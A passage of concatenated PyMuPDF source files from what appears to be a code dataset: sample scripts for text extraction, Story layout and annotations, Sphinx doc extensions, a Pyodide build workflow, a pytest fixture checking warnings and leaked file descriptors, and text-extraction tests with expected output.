    if flags & 1:  # bit 0: superscript
        names.append("superscript")
    if flags & 2:  # bit 1: italic
        names.append("italic")
    names.append("serifed" if flags & 4 else "sans")  # bit 2
    names.append("monospaced" if flags & 8 else "proportional")  # bit 3
    if flags & 16:  # bit 4: bold
        names.append("bold")
    return ", ".join(names)
doc = pymupdf.open(sys.argv[1]) # input document given on the command line
page = doc[0] # inspect the first page only
# read page text as a dictionary, suppressing extra spaces in CJK fonts
blocks = page.get_text("dict", flags=11)["blocks"]
for b in blocks: # iterate through the text blocks
    for l in b["lines"]: # iterate through the text lines
        for s in l["spans"]: # iterate through the text spans
            print("") # blank line between spans
            font_properties = "Font: '%s' (%s), size %g, color #%06x" % (
                s["font"], # font name
                flags_decomposer(s["flags"]), # readable font flags
                s["size"], # font size
                s["color"], # font color, printed as 6-digit hex
            )
            print("Text: '%s'" % s["text"]) # simple print of text
            print(font_properties)
| 1,221 | Python | .py | 36 | 26.305556 | 73 | 0.545377 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,319 | story-write.py | pymupdf_PyMuPDF/docs/samples/story-write.py | """
Demo script for PyMuPDF's `Story.write()` method.
This is a way of laying out a story into a PDF document, that avoids the need
to write a loop that calls `story.place()` and `story.draw()`.
Instead just a single function call is required, albeit with a `rectfn()`
callback that returns the rectangles into which the story is placed.
"""
import html
import pymupdf
# Create html containing multiple copies of our own source code.
#
# Read our own source and escape it, so it displays verbatim inside <pre>.
with open(__file__) as f:
    text = f.read()
text = html.escape(text)
# The document source. Named HTML (upper case) so that the stdlib `html`
# module imported above is not shadowed (the original rebound the name).
HTML = f'''
<!DOCTYPE html>
<body>
<h1>Contents of {__file__}</h1>
<h2>Normal</h2>
<pre>
{text}
</pre>
<h2>Strong</h2>
<strong>
<pre>
{text}
</pre>
</strong>
<h2>Em</h2>
<em>
<pre>
{text}
</pre>
</em>
</body>
'''
def rectfn(rect_num, filled):
    '''
    Rectangle callback for Story.write(): supplies the next rectangle to
    fill. We return four rectangles per page, in this order:
        1 3
        2 4

    Args:
        rect_num: 0-based number of the rectangle being requested.
        filled: rectangle covering the content placed so far (unused here).

    Returns:
        (mediabox, rect, ctm) - mediabox is non-None whenever a new page
        must be started (every fourth rectangle); ctm is always None.
    '''
    page_w = 800
    page_h = 600
    margin = 50
    rect_w = (page_w - 3*margin) / 2
    rect_h = (page_h - 3*margin) / 2
    if rect_num % 4 == 0:
        # New page.
        mediabox = pymupdf.Rect(0, 0, page_w, page_h)
    else:
        mediabox = None
    # Column first, then row: rects 0/1 fill the left column, 2/3 the right.
    rect_x = margin + (rect_w+margin) * ((rect_num // 2) % 2)
    rect_y = margin + (rect_h+margin) * (rect_num % 2)
    rect = pymupdf.Rect(rect_x, rect_y, rect_x + rect_w, rect_y + rect_h)
    #print(f'rectfn(): rect_num={rect_num} filled={filled}. Returning: rect={rect}')
    return mediabox, rect, None
# Lay the story out next to this script, one write() call - no manual loop.
story = pymupdf.Story(HTML, em=8)
out_path = __file__.replace('.py', '.pdf')
writer = pymupdf.DocumentWriter(out_path)
story.write(writer, rectfn)
writer.close()
| 1,638 | Python | .py | 63 | 22.873016 | 84 | 0.644932 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,320 | showpdf-page.py | pymupdf_PyMuPDF/docs/samples/showpdf-page.py | """
Demo of Story class in PyMuPDF
-------------------------------
This script demonstrates how to the results of a pymupdf.Story output can be
placed in a rectangle of an existing (!) PDF page.
"""
import io
import os
import pymupdf
def make_pdf(fileptr, text, rect, font="sans-serif", archive=None):
    """Lay out HTML `text` into a memory PDF whose pages are sized like `rect`.

    Args:
        fileptr: a writable Python file object, e.g. an io.BytesIO(),
            which receives the PDF built by DocumentWriter.
        text: the HTML source to lay out.
        rect: the target rectangle; only its width / height are used as
            the mediabox of the intermediate PDF.
        font: (str) font family for the story body, default sans-serif.
        archive: optional pymupdf.Archive - needed if e.g. images or
            special fonts are referenced.

    Returns:
        The matrix that maps page rectangles of the created PDF back to
        coordinates inside the parameter "rect".

    Normal use expects all text to fit in the given rect. On overflow,
    multiple pages are written - the caller may accept that or retry
    with changed parameters.
    """
    page_rect = pymupdf.Rect(0, 0, rect.width, rect.height)
    # matrix converting the intermediate page back onto the input rect
    to_target = page_rect.torect(rect)
    story = pymupdf.Story(text, archive=archive)
    story.body.set_properties(font=font)
    writer = pymupdf.DocumentWriter(fileptr)
    more = True
    while more:  # keep adding pages until the whole story is placed
        dev = writer.begin_page(page_rect)
        more, _ = story.place(page_rect)
        story.draw(dev)
        writer.end_page()
    writer.close()
    return to_target
# -------------------------------------------------------------
# We want to put this in a given rectangle of an existing page
# -------------------------------------------------------------
HTML = """
<p>PyMuPDF is a great package! And it still improves significantly from one version to the next one!</p>
<p>It is a Python binding for <b>MuPDF</b>, a lightweight PDF, XPS, and E-book viewer, renderer, and toolkit.<br> Both are maintained and developed by Artifex Software, Inc.</p>
<p>Via MuPDF it can access files in PDF, XPS, OpenXPS, CBZ, EPUB, MOBI and FB2 (e-books) formats,<br> and it is known for its top
<b><i>performance</i></b> and <b><i>rendering quality.</p>"""
# Make a PDF page for demo purposes
root = os.path.abspath( f"{__file__}/..") # directory of this script
doc = pymupdf.open(f"{root}/mupdf-title.pdf") # the existing PDF to modify
page = doc[0]
WHERE = pymupdf.Rect(50, 100, 250, 500) # target rectangle on existing page
fileptr = io.BytesIO() # let DocumentWriter use this as its file
# -------------------------------------------------------------------
# call DocumentWriter and Story to fill our rectangle
matrix = make_pdf(fileptr, HTML, WHERE)
# -------------------------------------------------------------------
src = pymupdf.open("pdf", fileptr) # open DocumentWriter output PDF
if src.page_count > 1: # more than one page: the rect could not hold the text
    raise ValueError("target WHERE too small")
# its page 0 contains our result - display it inside WHERE of the target page
page.show_pdf_page(WHERE, src, 0)
doc.ez_save(f"{root}/mupdf-title-after.pdf")
| 3,201 | Python | .py | 67 | 43.268657 | 177 | 0.639307 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,321 | annotations-freetext.py | pymupdf_PyMuPDF/docs/samples/annotations-freetext.py | # -*- coding: utf-8 -*-
import pymupdf

# Colors as RGB tuples with components in 0..1.
blue = (0, 0, 1)
green = (0, 1, 0)
red = (1, 0, 0)
gold = (1, 1, 0)

# Start a fresh PDF with a single page to draw on.
doc = pymupdf.open()
page = doc.new_page()

# Three rectangles of identical size, stacked vertically with a 25 pt gap.
rect_top = pymupdf.Rect(100, 100, 200, 150)
rect_mid = rect_top + (0, 75, 0, 75)
rect_bot = rect_mid + (0, 75, 0, 75)

# Sample text (Latin alphabet, including accented characters).
sample = "¡Un pequeño texto para practicar!"

# Three FreeText annotations; the last one is restyled after creation.
annot_top = page.add_freetext_annot(rect_top, sample, text_color=red, border_color=red)
annot_mid = page.add_freetext_annot(rect_mid, sample, fontname="Ti", text_color=blue, border_color=blue)
annot_bot = page.add_freetext_annot(rect_bot, sample, fontname="Co", text_color=blue, rotate=90)
annot_bot.set_border(width=0)
annot_bot.update(fontsize=8, fill_color=gold)

# Write the result to disk.
doc.save("a-freetext.pdf")
| 767 | Python | .py | 24 | 30.625 | 86 | 0.695238 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,322 | fulltoc.py | pymupdf_PyMuPDF/docs/extensions/fulltoc.py | # -*- encoding: utf-8 -*-
#
# Copyright © 2012 New Dream Network, LLC (DreamHost)
#
# Author: Doug Hellmann <doug.hellmann@dreamhost.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sphinx import addnodes
def html_page_context(app, pagename, templatename, context, doctree):
    """Handler for the "html-page-context" signal; mutates ``context`` in place.

    - Replaces the HTML builder's "toc" value with one rendered from the
      full document structure plus the local table of contents.
    - Forces "display_toc" on so the TOC shows even on empty pages.
    - Swaps the "toctree" callable for one that always renders the whole
      document tree, honouring only the prune/collapse options.
    """
    context["toc"] = get_rendered_toctree(app.builder, pagename)
    context["display_toc"] = True  # always display the table of contents

    if "toctree" not in context:
        # The json builder has no toctree function, so there is nothing to swap.
        return

    def full_toctree(collapse=True, maxdepth=-1, includehidden=True):
        # maxdepth/includehidden are accepted for template compatibility
        # but deliberately ignored: the full tree is always rendered.
        return get_rendered_toctree(
            app.builder,
            pagename,
            prune=False,
            collapse=collapse,
        )

    context["toctree"] = full_toctree
def get_rendered_toctree(builder, docname, prune=False, collapse=True):
    """Build the full toctree relative to ``docname`` and return the
    rendered HTML fragment for it.
    """
    toctree_node = build_full_toctree(
        builder,
        docname,
        prune=prune,
        collapse=collapse,
    )
    return builder.render_partial(toctree_node)["fragment"]
def build_full_toctree(builder, docname, prune, collapse):
    """Return one merged toctree node covering every sub-document doctree,
    resolved relative to ``docname``; ``None`` if the master document has
    no toctree directives.
    """
    env = builder.env
    master = env.get_doctree(env.config.master_doc)

    # Resolve each toctree directive found in the master document.
    resolved = []
    for node in master.traverse(addnodes.toctree):
        tree = env.resolve_toctree(
            docname,
            builder,
            node,
            collapse=collapse,
            prune=prune,
            includehidden=True,
        )
        if tree is not None:
            resolved.append(tree)

    if not resolved:
        return None

    # Merge everything into the first resolved tree.
    merged = resolved[0]
    for extra in resolved[1:]:
        if extra:
            merged.extend(extra.children)
    env.resolve_references(merged, docname, builder)
    return merged
def setup(app):
    """Sphinx extension entry point: register the full-TOC context rewriter."""
    app.connect("html-page-context", html_page_context)
| 3,164 | Python | .py | 84 | 31.607143 | 75 | 0.689172 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,323 | searchrepair.py | pymupdf_PyMuPDF/docs/extensions/searchrepair.py | import os
def modify_search_index(app, exception):
    """Strip ".txt" suffixes from the filenames list in Sphinx's searchindex.js.

    Connected to the "build-finished" event.  Runs only when the build
    succeeded (``exception is None``) and the index file exists; ``app``
    only needs an ``outdir`` attribute.
    """
    if exception is not None:  # build failed - leave the index untouched
        return
    filename = os.path.join(app.outdir, "searchindex.js")
    if not os.path.exists(filename):
        return
    with open(filename) as searchfile:
        data = searchfile.read()
    p1 = data.find("filenames:[")
    if p1 < 0:
        # Marker missing (unexpected index format) - do not rewrite blindly.
        # The original code would have sliced with a negative index here.
        return
    p2 = data.find("]", p1)
    # Rewrite only the filenames section, so ".txt" occurring elsewhere
    # in the index (e.g. inside titles) is preserved.
    fixed = data[:p1] + data[p1:p2].replace(".txt", "") + data[p2:]
    with open(filename, "w") as searchfile:
        searchfile.write(fixed)
def setup(app):
    """Sphinx extension entry point: post-process the search index after a build."""
    app.connect("build-finished", modify_search_index)
| 729 | Python | .py | 19 | 27.105263 | 62 | 0.542735 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,324 | test_pyodide.yml | pymupdf_PyMuPDF/.github/workflows/test_pyodide.yml | name: Build Pyodide wheel
# Builds a Pyodide (WebAssembly) wheel for PyMuPDF, either manually or nightly.
on:
  workflow_dispatch:
    inputs:
      PYMUPDF_SETUP_MUPDF_BUILD:
        description: 'Value for PYMUPDF_SETUP_MUPDF_BUILD, e.g.: git:--branch master https://github.com/ArtifexSoftware/mupdf.git'
        type: string
        #default: 'git:--branch master https://github.com/ArtifexSoftware/mupdf.git'
        default: '-'
      PYMUPDF_SETUP_PY_LIMITED_API:
        type: string
        default: '1'
  # Nightly run at 05:13 UTC.
  schedule:
    - cron: '13 5 * * *'
jobs:
  build_pyodide:
    name: Build pyodide wheel
    runs-on: ubuntu-latest
    strategy:
      matrix:
        # 2023-12-22: Python-3.12 is known to fail, due to setuptools trying to
        # import distutils.
        python-version: ["3.11"]
      # Avoid cancelling of all runs after a single failure.
      fail-fast: false
    steps:
    - uses: actions/checkout@v4
    - uses: actions/setup-python@v5
      with:
        python-version: ${{ matrix.python-version }}
    # The inputs_* environment variables are read by scripts/gh_release.py.
    - name: build_pyodide_wheel
      env:
        inputs_sdist: 0
        inputs_PYMUPDF_SETUP_MUPDF_BUILD: ${{inputs.PYMUPDF_SETUP_MUPDF_BUILD}}
        PYMUPDF_SETUP_PY_LIMITED_API: ${{inputs.PYMUPDF_SETUP_PY_LIMITED_API}}
        inputs_wheels_default: 0
        inputs_wheels_linux_pyodide: 1
      run:
        python scripts/gh_release.py build
    # Upload generated wheels, to be accessible from github Actions page.
    #
    # NOTE(review): actions/upload-artifact@v3 is deprecated on GitHub-hosted
    # runners; consider upgrading to @v4 (verify artifact naming first).
    - uses: actions/upload-artifact@v3
      with:
        path: ./wheelhouse/*.whl
21,325 | conftest.py | pymupdf_PyMuPDF/tests/conftest.py | import os
import platform
import pymupdf
import pytest
@pytest.fixture(autouse=True)
def wrap(*args, **kwargs):
    '''
    Check that tests return with empty MuPDF warnings buffer. For example this
    detects failure to call fz_close_output() before fz_drop_output(), which
    (as of 2024-4-12) generates a warning from MuPDF.
    As of 2024-09-12 we also detect whether tests leave fds open; but for now
    do not fail tests, because many tests need fixing.
    '''
    # --- Pre-test checks: fail early if a previous test leaked state. ---
    wt = pymupdf.TOOLS.mupdf_warnings()
    assert not wt, f'{wt=}'
    assert not pymupdf.TOOLS.set_small_glyph_heights()
    # Record the lowest free fd by opening/closing a throwaway file.
    next_fd_before = os.open(__file__, os.O_RDONLY)
    os.close(next_fd_before)
    if platform.system() == 'Linux':
        # Gather detailed information about leaked fds.
        def get_fds():
            import subprocess
            # Snapshot /proc/<pid>/fd into files in the current directory.
            path = 'PyMuPDF-linx-fds'
            path_l = 'PyMuPDF-linx-fds-l'
            command = f'ls /proc/{os.getpid()}/fd > {path}'
            command_l = f'ls -l /proc/{os.getpid()}/fd > {path_l}'
            # shell=1 is truthy, i.e. equivalent to shell=True.
            subprocess.run(command, shell=1)
            subprocess.run(command_l, shell=1)
            with open(path) as f:
                ret = f.read()
            ret = ret.replace('\n', ' ')
            with open(path_l) as f:
                ret_l = f.read()
            return ret, ret_l
        open_fds_before, open_fds_before_l = get_fds()
    # Reset and enable pymupdf.log() capture for the duration of the test.
    pymupdf._log_items_clear()
    pymupdf._log_items_active(True)
    # Run the test.  (pytest does not send a value, so `rep` is always None.)
    rep = yield
    # Test has run; check it did not create any MuPDF warnings etc.
    wt = pymupdf.TOOLS.mupdf_warnings()
    if not hasattr(pymupdf, 'mupdf'):
        print(f'Not checking mupdf_warnings on classic.')
    else:
        assert not wt, f'Warnings text not empty: {wt=}'
    assert not pymupdf.TOOLS.set_small_glyph_heights()
    # The test must not have called pymupdf.log().
    log_items = pymupdf._log_items()
    assert not log_items, f'log() was called; {len(log_items)=}.'
    if platform.system() == 'Linux':
        # Show detailed information about leaked fds.
        open_fds_after, open_fds_after_l = get_fds()
        if open_fds_after != open_fds_before:
            import textwrap
            print(f'Test has changed process fds:')
            print(f'    {open_fds_before=}')
            print(f'    {open_fds_after=}')
            print(f'open_fds_before_l:')
            print(textwrap.indent(open_fds_before_l, '    '))
            print(f'open_fds_after_l:')
            print(textwrap.indent(open_fds_after_l, '    '))
            #assert 0
    # Leak detection: the lowest free fd should be unchanged.  Deliberately
    # only a warning for now (see docstring) - many tests still need fixing.
    next_fd_after = os.open(__file__, os.O_RDONLY)
    os.close(next_fd_after)
    if next_fd_after != next_fd_before:
        print(f'Test has leaked fds, {next_fd_before=} {next_fd_after=}. {args=} {kwargs=}.')
        #assert 0, f'Test has leaked fds, {next_fd_before=} {next_fd_after=}. {args=} {kwargs=}.'
| 2,861 | Python | .py | 66 | 34.530303 | 97 | 0.601383 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,326 | test_textextract.py | pymupdf_PyMuPDF/tests/test_textextract.py | """
Extract page text in various formats.
No checks performed - just contribute to code coverage.
"""
import os
import sys
import pymupdf
pymupdfdir = os.path.abspath(f'{__file__}/../..')
scriptdir = f'{pymupdfdir}/tests'
filename = os.path.join(scriptdir, "resources", "symbol-list.pdf")
def test_extract1():
    """Exercise every text extraction variant on one page (coverage only).

    No output values are checked; the goal is that none of the extraction
    calls raises.  The document is closed afterwards so the autouse `wrap`
    fixture does not see a leaked file descriptor (the original left the
    document open and repeatedly overwrote throwaway variables).
    """
    doc = pymupdf.open(filename)
    try:
        page = doc[0]
        # Plain / word / block level extraction.
        page.get_text("text")
        page.get_text("blocks")
        page.get_text("words")
        # Structured (dict / json) variants.
        page.get_text("dict")
        page.get_text("json")
        page.get_text("rawdict")
        page.get_text("rawjson")
        # Markup variants.
        page.get_text("html")
        page.get_text("xhtml")
        page.get_text("xml")
        # Helper APIs that also consume page text.
        pymupdf.get_highlight_selection(page, start=page.rect.tl, stop=page.rect.br)
        pymupdf.ConversionHeader("xml")
        pymupdf.ConversionTrailer("xml")
    finally:
        doc.close()
def _test_extract2():
    """Disabled benchmark: time every get_text() option, with and without
    explicit flags, against a large PDF.

    Only runs when the PyMuPDF-performance checkout exists next to the
    repository; otherwise prints a notice and returns.
    """
    import sys
    import time
    path = f'{scriptdir}/../../PyMuPDF-performance/adobe.pdf'
    if not os.path.exists(path):
        print(f'test_extract2(): not running because does not exist: {path}')
        return
    doc = pymupdf.open(path)
    options = (
            'dict',
            'dict2',
            'text',
            'blocks',
            'words',
            'html',
            'xhtml',
            'xml',
            'json',
            'rawdict',
            'rawjson',
            )
    for opt in options:
        for flags in (None, pymupdf.TEXTFLAGS_TEXT):
            started = time.time()
            for page in doc:
                page.get_text(opt, flags=flags)
            t = time.time() - started
            print(f't={t:.02f}: opt={opt} flags={flags}')
            sys.stdout.flush()
def _test_extract3():
    """Disabled benchmark: time 'json' extraction over all pages of a large PDF.

    Requires the PyMuPDF-performance checkout next to the repository.
    """
    import sys
    import time
    path = f'{scriptdir}/../../PyMuPDF-performance/adobe.pdf'
    if not os.path.exists(path):
        print(f'test_extract3(): not running because does not exist: {path}')
        return
    doc = pymupdf.open(path)
    started = time.time()
    for page in doc:
        page.get_text('json')
    t = time.time() - started
    print(f't={t}')
    sys.stdout.flush()
def test_extract4():
    '''
    Rebased-specific.
    Writes page 4 of tests/resources/2.pdf as HTML twice - once via
    Page.get_text('html'), once via the raw MuPDF document-writer API -
    then (on MuPDF >= 1.23.4) extracts plain text with various
    `space-guess` writer options and compares the results.
    NOTE(review): `document` is never closed, so this test leaks an fd.
    '''
    if not hasattr(pymupdf, 'mupdf'):
        # Classic (non-rebased) implementation has no `mupdf` module.
        return
    path = f'{pymupdfdir}/tests/resources/2.pdf'
    document = pymupdf.open(path)
    page = document[4]
    out = 'test_stext.html'
    text = page.get_text('html')
    with open(out, 'w') as f:
        f.write(text)
    print(f'Have written to: {out}')
    # Same page again, this time through the low-level document writer.
    out = 'test_extract.html'
    writer = pymupdf.mupdf.FzDocumentWriter(
        out,
        'html',
        pymupdf.mupdf.FzDocumentWriter.OutputType_DOCX,
    )
    device = pymupdf.mupdf.fz_begin_page(writer, pymupdf.mupdf.fz_bound_page(page))
    pymupdf.mupdf.fz_run_page(page, device, pymupdf.mupdf.FzMatrix(), pymupdf.mupdf.FzCookie())
    pymupdf.mupdf.fz_end_page(writer)
    pymupdf.mupdf.fz_close_document_writer(writer)
    print(f'Have written to: {out}')
    if pymupdf.mupdf_version_tuple >= (1, 23, 4):
        def get_text(page, space_guess):
            # Extract plain text through a document writer configured with
            # the given space-guess value; returns (text, space_count).
            buffer_ = pymupdf.mupdf.FzBuffer( 10)
            out = pymupdf.mupdf.FzOutput( buffer_)
            writer = pymupdf.mupdf.FzDocumentWriter(
                    out,
                    # NOTE(review): missing f-prefix - `{space_guess}` is passed
                    # literally, so every call uses identical writer options.
                    # That is presumably why `text1 == text0` holds below;
                    # confirm the assertion still passes before adding the `f`.
                    'text,space-guess={space_guess}',
                    pymupdf.mupdf.FzDocumentWriter.OutputType_DOCX,
                    )
            device = pymupdf.mupdf.fz_begin_page(writer, pymupdf.mupdf.fz_bound_page(page))
            pymupdf.mupdf.fz_run_page(page, device, pymupdf.mupdf.FzMatrix(), pymupdf.mupdf.FzCookie())
            pymupdf.mupdf.fz_end_page(writer)
            pymupdf.mupdf.fz_close_document_writer(writer)
            text = buffer_.fz_buffer_extract()
            text = text.decode('utf8')
            n = text.count(' ')
            print(f'{space_guess=}: {n=}')
            return text, n
        page = document[4]
        text0, n0 = get_text(page, 0)
        text1, n1 = get_text(page, 0.5)
        text2, n2 = get_text(page, 0.001)
        text2, n2 = get_text(page, 0.1)
        text2, n2 = get_text(page, 0.3)
        text2, n2 = get_text(page, 0.9)
        text2, n2 = get_text(page, 5.9)
        assert text1 == text0
def test_2954():
    '''
    Check handling of unknown unicode characters, issue #2954, fixed in
    mupdf-1.23.9 with addition of FZ_STEXT_USE_CID_FOR_UNKNOWN_UNICODE.
    '''
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_2954.pdf')
    # Flags deliberately omitting TEXT_CID_FOR_UNKNOWN_UNICODE: this is the
    # "bad" configuration that produces U+FFFD replacement characters.
    flags0 = (0
            | pymupdf.TEXT_PRESERVE_WHITESPACE
            | pymupdf.TEXT_PRESERVE_LIGATURES
            | pymupdf.TEXT_MEDIABOX_CLIP
            )
    document = pymupdf.Document(path)
    # Golden text for a correct ("good") extraction of the single page.
    expected_good = (
            "IT-204-IP (2021) Page 3 of 5\nNYPA2514 12/06/21\nPartner's share of \n"
            " modifications (see instructions)\n20\n State additions\nNumber\n"
            "A ' Total amount\nB '\n State allocated amount\n"
            "EA '\n20a\nEA '\n20b\nEA '\n20c\nEA '\n20d\nEA '\n20e\nEA '\n20f\n"
            "Total addition modifications (total of column A, lines 20a through 20f)\n"
            ". . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
            "21\n21\n22\n State subtractions\n"
            "Number\nA ' Total amount\nB '\n State allocated amount\n"
            "ES '\n22a\nES '\n22b\nES '\n22c\nES '\n22d\nES '\n22e\nES '\n22f\n23\n23\n"
            "Total subtraction modifications (total of column A, lines 22a through 22f). . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
            "Additions to itemized deductions\n24\nAmount\n"
            "Letter\n"
            "24a\n24b\n24c\n24d\n24e\n24f\n"
            "Total additions to itemized deductions (add lines 24a through 24f)\n"
            ". . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
            "25\n25\n"
            "Subtractions from itemized deductions\n"
            "26\nLetter\nAmount\n26a\n26b\n26c\n26d\n26e\n26f\n"
            "Total subtractions from itemized deductions (add lines 26a through 26f) . . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
            "27\n27\n"
            "This line intentionally left blank. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
            "28\n28\n118003213032\n"
            )
    def check_good(text):
        '''
        Returns true if `text` is approximately the same as `expected_good`.
        2024-01-09: MuPDF master and 1.23.x give slightly different 'good'
        output, differing in a missing newline. So we compare without newlines.
        '''
        return text.replace('\n', '') == expected_good.replace('\n', '')
    # Expected counts of U+FFFD replacement characters.
    n_fffd_good = 0
    n_fffd_bad = 749
    def get(flags=None):
        # Extract the single page's text and count replacement characters.
        text = [page.get_text(flags=flags) for page in document]
        assert len(text) == 1
        text = text[0]
        n_fffd = text.count(chr(0xfffd))
        if 0:
            # This print() fails on Windows with UnicodeEncodeError.
            print(f'{flags=} {n_fffd=} {text=}')
        return text, n_fffd
    text_none, n_fffd_none = get()
    text_0, n_fffd_0 = get(flags0)
    if pymupdf.mupdf_version_tuple >= (1, 23, 9):
        # Fixed MuPDF: default flags and explicit CID flag both give good
        # text; flags0 (without the CID flag) still gives the bad text.
        text_1, n_fffd_1 = get(flags0 | pymupdf.TEXT_CID_FOR_UNKNOWN_UNICODE)
        assert n_fffd_none == n_fffd_good
        assert n_fffd_0 == n_fffd_bad
        assert n_fffd_1 == n_fffd_good
        assert check_good(text_none)
        assert not check_good(text_0)
        assert check_good(text_1)
    else:
        # Older MuPDF: extraction is bad regardless of flags.
        assert n_fffd_none == n_fffd_bad
        assert n_fffd_0 == n_fffd_bad
        assert not check_good(text_none)
        assert not check_good(text_0)
def test_3027():
    """get_text() via pymupdf.utils with an explicit, pre-built TextPage
    (issue #3027).

    Fixes the original's duplicated assignment typo (`path = path = ...`)
    and closes the document so no file descriptor is leaked.
    """
    path = f'{pymupdfdir}/tests/resources/2.pdf'
    doc = pymupdf.open(path)
    try:
        page = doc[0]
        textpage = page.get_textpage()
        # Passing textpage= must reuse the supplied TextPage.
        pymupdf.utils.get_text(page=page, option="dict", textpage=textpage)["blocks"]
    finally:
        doc.close()
def test_3186():
texts_expected = [
"Assicurazione sulla vita di tipo Unit Linked\nDocumento informativo precontrattuale aggiuntivo\nper i prodotti d\x00investimento assicurativi\n(DIP aggiuntivo IBIP)\nImpresa: AXA MPS Financial DAC \nProdotto: Progetto Protetto New - Global Dividends\nContratto Unit linked (Ramo III)\nData di realizzazione: Aprile 2023\nIl presente documento contiene informazioni aggiuntive e complementari rispetto a quelle presenti nel documento \ncontenente le informazioni chiave per i prodotti di investimento assicurativi (KID) per aiutare il potenziale \ncontraente a capire più nel dettaglio le caratteristiche del prodotto, gli obblighi contrattuali e la situazione \npatrimoniale dell\x00impresa.\nIl Contraente deve prendere visione delle condizioni d\x00assicurazione prima della sottoscrizione del Contratto.\nAXA MPS Financial DAC, Wolfe Tone House, Wolfe Tone Street, Dublin, DO1 HP90, Irlanda; Tel: 00353-1-6439100; \nsito internet: www.axa-mpsfinancial.ie; e-mail: supporto@axa-mpsfinancial.ie;\nAXA MPS Financial DAC, società del Gruppo Assicurativo AXA Italia, iscritta nell\x00Albo delle Imprese di assicurazione \ncon il numero II.00234. \nLa Compagnia mette a disposizione dei clienti i seguenti recapiti per richiedere eventuali informazioni sia in merito alla \nCompagnia sia in relazione al contratto proposto: Tel: 00353-1-6439100; sito internet: www.axa-mpsfinancial.ie; \ne-mail: supporto@axa-mpsfinancial.ie;\nAXA MPS Financial DAC è un\x00impresa di assicurazione di diritto Irlandese, Sede legale 33 Sir John Rogerson's Quay, \nDublino D02 XK09 Irlanda. L\x00Impresa di Assicurazione è stata autorizzata all\x00esercizio dell\x00attività assicurativa con \nprovvedimento n. C33602 emesso dalla Central Bank of Ireland (l\x00Autorità di vigilanza irlandese) in data 14/05/1999 \ned è iscritta in Irlanda presso il Companies Registration Office (registered nr. 293822). \nLa Compagnia opera in Italia esclusivamente in regime di libera prestazione di servizi ai sensi dell\x00art. 
24 del D. Lgs. \n07/09/2005, n. 209 e può investire in attivi non consentiti dalla normativa italiana in materia di assicurazione sulla \nvita, ma in conformità con la normativa irlandese di riferimento in quanto soggetta al controllo della Central Bank of \nIreland.\nCon riferimento all\x00ultimo bilancio d\x00esercizio (esercizio 2021) redatto ai sensi dei principi contabili vigenti, il patrimonio \nnetto di AXA MPS Financial DAC ammonta a 139,6 milioni di euro di cui 635 mila euro di capitale sociale interamente \nversato e 138,9 milioni di euro di riserve patrimoniali compreso il risultato di esercizio.\nAl 31 dicembre 2021 il Requisito patrimoniale di solvibilità è pari a 90 milioni di euro (Solvency Capital Requirement, \nSCR). Sulla base delle valutazioni effettuate della Compagnia coerentemente con gli esistenti dettami regolamentari, il \nRequisito patrimoniale minimo al 31 dicembre 2021 ammonta a 40 milioni di euro (Minimum Capital Requirement, \nMCR).\nL'indice di solvibilità di AXA MPS Financial DAC, ovvero l'indice che rappresenta il rapporto tra l'ammontare del margine \ndi solvibilità disponibile e l'ammontare del margine di solvibilità richiesto dalla normativa vigente, e relativo all'ultimo \nbilancio approvato, è pari al 304% (solvency ratio). L'importo dei fondi propri ammissibili a copertura dei requisiti \npatrimoniali è pari a 276 milioni di euro (Eligible Own Funds, EOF).\nPer informazioni patrimoniali sulla società è possibile consultare il sito: www.axa-mpsfinancial.ie/chi-siamo\nSi rinvia alla relazione sulla solvibilità e sulla condizione finanziaria dell\x00impresa (SFCR) disponibile sul sito internet \ndella Compagnia al seguente link www.axa-mpsfinancial.ie/comunicazioni \nAl contratto si applica la legge italiana\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 1 di 9\n",
"Quali sono le prestazioni?\nIl contratto prevede le seguenti prestazioni:\na)Prestazioni in caso di vita dell'assicurato\nPrestazione in caso di Riscatto Totale e parziale\nA condizione che siano trascorsi almeno 30 giorni dalla Data di Decorrenza (conclusione del Contratto) e fino all\x00ultimo \nGiorno Lavorativo della terzultima settimana precedente la data di scadenza, il Contraente può riscuotere, interamente \no parzialmente, il Valore di Riscatto. In caso di Riscatto totale, la liquidazione del Valore di Riscatto pone fine al \nContratto con effetto dalla data di ricezione della richiesta.\nIl Contraente ha inoltre la facoltà di esercitare parzialmente il diritto di Riscatto, nella misura minima di 500,00 euro, \nda esercitarsi con le stesse modalità previste per il Riscatto totale. In questo caso, il Contratto rimane in vigore per \nl\x00ammontare residuo, a condizione che il Controvalore delle Quote residue del Contratto non sia inferiore a 1.000,00 \neuro.\nb) Prestazione a Scadenza\nAlla data di scadenza, sempre che l\x00Assicurato sia in vita, l\x00Impresa di Assicurazione corrisponderà agli aventi diritto un \nammontare risultante dal Controvalore delle Quote collegate al Contratto alla scadenza, 